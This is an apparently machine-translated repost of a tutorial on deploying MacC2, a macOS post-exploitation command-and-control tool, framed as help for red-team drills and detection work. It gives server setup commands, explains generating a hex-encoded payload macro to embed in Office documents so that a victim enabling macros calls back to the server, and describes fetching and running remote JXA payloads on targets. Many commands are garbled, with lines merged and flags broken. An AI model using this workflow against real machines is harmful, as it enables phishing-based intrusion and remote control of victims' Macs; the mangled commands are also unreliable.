Shulou(Shulou.com)06/03 Report--

Editor to share with you how to use MacC2 to exploit post-penetration vulnerabilities in macOS. I hope you will gain something after reading this article. Let's discuss it together.

MacC2

MacC2 is a Python-based macOS post-penetration exploit tool that uses Objective-C calls or Python code libraries rather than command-line execution. MacC2's client is based on Python2 development, and although Python2 is now deprecated, it can still be provided with the Big Sur installation. In the future, Apple is likely to remove Python2 from the basic installation components of the macOS (or simply remove the preset Python environment support), but that hasn't happened until November 2020.

The main purpose of this tool is to help the security research team conduct penetration testing technology drills and build a detection mechanism for the post-Python penetration exploit framework on macOS. Apple plans to remove the script runtime environment from the base installation of macOS, and we don't know when, but the current Big Sur installation still includes Python.

The current version of MacC2 has been tested on Catalina and Big Sur. On Big-Sur, the only function that doesn't work as expected is the systeminfo command.

You can set up the server locally, or you can use the Docker settings I provide in this project code base.

Run MacC2 using Docker

If you have not already installed Docker, install and configure Docker using the following command:

Chmod + x install_docker_linux.shsudo. / install_docker_linux.sh

Next, run the following command. The following command will create an untrusted SSL certificate and key, generate a macro file (macro.txt) for the server and port, and then build the macc2-docker. After the build is complete, the MacC2 server will be run in interactive mode in macc2-docker.

At this point, the tool will ask us to output the IP/ hostname of the MacC2 server:

Then enter the port number that the MacC2 server needs to listen on:

The tool will generate a hexadecimal encoded Payload and store it in a local file named macro.txt, which can connect to your MacC2 server. The hostname, IP, and port all correspond to the user's settings:

Docker will install aiohttp Python3 dependencies, build macc2-docker, and then run the MacC2 server in the container. When complete, the MacC2 server will listen on the port specified by the user:

Now we can verify the running status of the MacC2 server using the following command:

Docker ps

In addition, the installation script configures a shared mount between the container and the host. On the host, we can browse / var/lib/docker/volumes/macc2/_data to access MacC2_client.py and macro.txt.

We can also copy the MacC2_client.py file to the client and provide a callback after execution, or import the macro.txt macro file directly into an Office document, and after enabling the macro feature, the callback will be opened on the client side.

Run locally (without using Docker)

If you don't want to use Docker, you can also build and configure the server locally:

Researchers can use the following commands to clone the source code of the project locally:

Git clone https://github.com/cedowens/MacC2.git

Since the MacC2 server uses the aiohttp library for network communication, we will first install aiohttp:

Pip install aiohttppython3-m pip install-upgrade-force pip

Next, on the C2 server, configure SSL (the key size is at least 2048):

Openssl req-new-newkey rsa:2048-nodes-out ca.csr-keyout ca.keyopenssl x509-trustout-signkey ca.key-days 365-req-in ca.csr-out ca.pem

Please note that the file names of ca.pem and ca.key are not modified.

Then, use macro_generator.py to create the MacC2 script, and then specify the IP/ domain name and port number of the server. Macro_generator.py also builds a hexadecimal encoded macro file (macro.txt) to run MacC2. We can copy the contents of the file into an MS Office document.

Use sample: python3 macro_generatory.py-s [C2 Server IP/domain]-p [C2 Server Port]

Use MacC2_server.py scripts to listen for connections:

On the client side (the target is the macOS host), run the MacC2_client.py script using the following command:

Python MacC2_client.py

At this point on the server side, you will see the incoming connection:

MacC2 usage

After receiving the connection, we can use the "help" command on the server side to get a list of built-in available commands, and then enter the target command to view the details:

You can also generate a Mythic C2 JXA .js Payload and host it on a remote server. Next, use the runjxa command to provide MacC2 with the URL of the managed file, and execute Mythic .JXA Payload:

>

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.